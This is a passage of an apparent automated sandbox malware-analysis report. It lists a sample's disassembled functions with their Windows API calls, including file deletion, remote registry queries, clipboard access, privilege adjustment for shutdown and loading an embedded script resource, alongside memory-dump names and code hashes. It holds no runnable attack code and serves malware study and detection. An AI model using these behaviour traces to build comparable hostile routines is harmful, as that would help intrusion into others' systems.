                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: cbbce96a08759644e0af2393d4f974c3eba3924271542b77aca361cb64a664dd
                                                                                                                                                                                                                                                                  • Instruction ID: 34d15983533419dc92ba2f1cf7c0418fb0cc73ae70ef59946a8be834884a98bb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbbce96a08759644e0af2393d4f974c3eba3924271542b77aca361cb64a664dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831B0726007296EDF10AFB8DC49EDE73AD9F05321F144255EC19E2190EB70DA898A75
                                                                                                                                                                                                                                                                  Function 00D54763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D54785
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D547B2
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D547E2
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D54803
                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00D54813
                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D5489A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D548A5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D548B0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                  • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                  • Opcode ID: d4f6a089bc9436f834b6fef44fc9057b125bfc8f92f1ae2709e6878019d4eed8
                                                                                                                                                                                                                                                                  • Instruction ID: fb5acf7135dff8235d202ac789ba07910e6f0832b07674bd805389326f39a468
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f6a089bc9436f834b6fef44fc9057b125bfc8f92f1ae2709e6878019d4eed8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C531A171900249ABDF219BA0DC49FEB37BDEF89705F5040B6FA09D6160EB7096888B75
                                                                                                                                                                                                                                                                  Function 00D5A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00D5A203
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D5A25E
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A269
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00D5A285
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D5A2D5
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00DA7B94), ref: 00D5A2F3
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D5A2FD
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A30A
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A31A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D4E3B4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: cf53893422437b8d8969577282e73d6211b83bb7ed165653ae8f29b31fa57737
                                                                                                                                                                                                                                                                  • Instruction ID: 99a7c309ea62b80917f821a96c098eae8a1a31e37b335d36269311df42b75da1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf53893422437b8d8969577282e73d6211b83bb7ed165653ae8f29b31fa57737
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 793126311002296EDF10AFA8EC4AADE77ADEF05325F144255EC18E31D0EB31CE898A75
                                                                                                                                                                                                                                                                  Function 00D6C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C99E
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00D6CA09
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6CA2D
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D6CA8C
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D6CB47
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D6CBB4
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D6CC49
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00D6CC9A
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D6CD43
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D6CDE2
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6CDEF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2f01816a6c7e8959b0d6b3a3aa2ffb551715923f5d1c18ecd0ea0436a605a5d8
                                                                                                                                                                                                                                                                  • Instruction ID: d4d07112492dfb4de1b6867c18da8c96cc8decf30496619d0efd132c3da78486
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f01816a6c7e8959b0d6b3a3aa2ffb551715923f5d1c18ecd0ea0436a605a5d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0024F71614240AFD714DF28C895E3ABBE5EF48314F18949DF889CB2A2DB31ED46CB61
                                                                                                                                                                                                                                                                  Function 00D4D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4EAB0: GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D4D9CD
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00D4DA88
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00D4DA9B
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D4DAB8
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D4DAE2
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00D4DAC7,?,?), ref: 00D4DB5D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00D4DAFE
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4DB0F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                  • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                  • Opcode ID: 80dd7cec2d44cacab0c19205ef011f1015c241d68222a88e3a4319be85162405
                                                                                                                                                                                                                                                                  • Instruction ID: e3d1dfafcf341b214f127a6525149dd60bad2c042f9e864b0e3da23876f0f46f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80dd7cec2d44cacab0c19205ef011f1015c241d68222a88e3a4319be85162405
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4613B3180124DAFCF05EBE1CA529EEB7B6AF14300F6441A9E446B7196EB716F09DB60
                                                                                                                                                                                                                                                                  Function 00D5F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5c00a0c49238133dfdcb308494d828faafe7ef4dd595e2ea2609ac4a91acd46b
                                                                                                                                                                                                                                                                  • Instruction ID: aaa339f640c9bdc44f8ef606c1171365146f5fc90994ea5e4092814e1324476d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c00a0c49238133dfdcb308494d828faafe7ef4dd595e2ea2609ac4a91acd46b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53419A75604611AFDB10DF15D888B19BBE5EF04319F1884A8E8198F7A2DB35EC86CBA0
                                                                                                                                                                                                                                                                  Function 00D4F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D4205A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D42087
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42010: GetLastError.KERNEL32 ref: 00D42097
                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00D4F249
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                  • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                  • Opcode ID: 102705c67fcbe5bcb68d2fa05de3cea5ed1e27dbe42bb1cb1090c718b9485a87
                                                                                                                                                                                                                                                                  • Instruction ID: 1039230b4e206e453ffd74e2c92802241384ed8e96c363925e59f63484ac0e38
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 102705c67fcbe5bcb68d2fa05de3cea5ed1e27dbe42bb1cb1090c718b9485a87
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6001D67A6102206BEB1467B89CCABBF72ACDF08344F150931FD42F21E2E5A09D4591B8
                                                                                                                                                                                                                                                                  Function 00D1BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1BD54
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1BD78
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1BEFF
                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00D846D0), ref: 00D1BF11
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00DB221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D1BF89
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00DB2270,000000FF,?,0000003F,00000000,?), ref: 00D1BFB6
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1C0CB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                                                                                                                                                  • Opcode ID: b56e68a10a2282eefb39bdb1c7d76cdf0f56ced11f15e62932e6b8cf50f17b79
                                                                                                                                                                                                                                                                  • Instruction ID: 2bb709f20d2d94f1da3860429dce7cf3c70dd8b463d2b6bdd94198a2b39ab6c7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b56e68a10a2282eefb39bdb1c7d76cdf0f56ced11f15e62932e6b8cf50f17b79
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C1E772900205BBDB149F64FC41AEA7BB9EF45320F18459BE595DB251EF318D828B70
                                                                                                                                                                                                                                                                  Function 00D53A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D256C2,?,?,00000000,00000000), ref: 00D53A1E
                                                                                                                                                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D256C2,?,?,00000000,00000000), ref: 00D53A35
                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00D256C2,?,?,00000000,00000000,?,?,?,?,?,?,00CE66CE), ref: 00D53A45
                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00D256C2,?,?,00000000,00000000,?,?,?,?,?,?,00CE66CE), ref: 00D53A56
                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00D256C2,?,?,00D256C2,?,?,00000000,00000000,?,?,?,?,?,?,00CE66CE,?), ref: 00D53A65
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                  • String ID: SCRIPT
                                                                                                                                                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                  • Opcode ID: 58e05214031854df3d4a4fedd2a4f7121e4ecefb0e85b477ca1b2ac0b9a61068
                                                                                                                                                                                                                                                                  • Instruction ID: 42e1aa6158dd8843f1d699bef3836243b8e4d678327a7f203ec16b02f0d61acb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58e05214031854df3d4a4fedd2a4f7121e4ecefb0e85b477ca1b2ac0b9a61068
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66113C71200701BFDB218B65DC48F27BBBAEFC5B51F14426CB946DA260EB71D9458670
                                                                                                                                                                                                                                                                  Function 00D420AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D41916
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D41922
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D41931
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D41938
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D4194E
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00D41C81), ref: 00D420FB
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D42107
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00D4210E
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D42127
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00D41C81), ref: 00D4213B
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D42142
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                  • Opcode ID: b94bf831821ab707337ffdc37698a9a42839035bf9739da9deeaedb130440011
                                                                                                                                                                                                                                                                  • Instruction ID: 78521d3ab55e2560c8384adf2df9802445dbabd9646f76c34104f99b787f71a0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b94bf831821ab707337ffdc37698a9a42839035bf9739da9deeaedb130440011
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B119A71500705ABEB109BA4CC09BBEBBBAEF55365F984018F985E7220D7359A80CB70
                                                                                                                                                                                                                                                                  Function 00D5A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
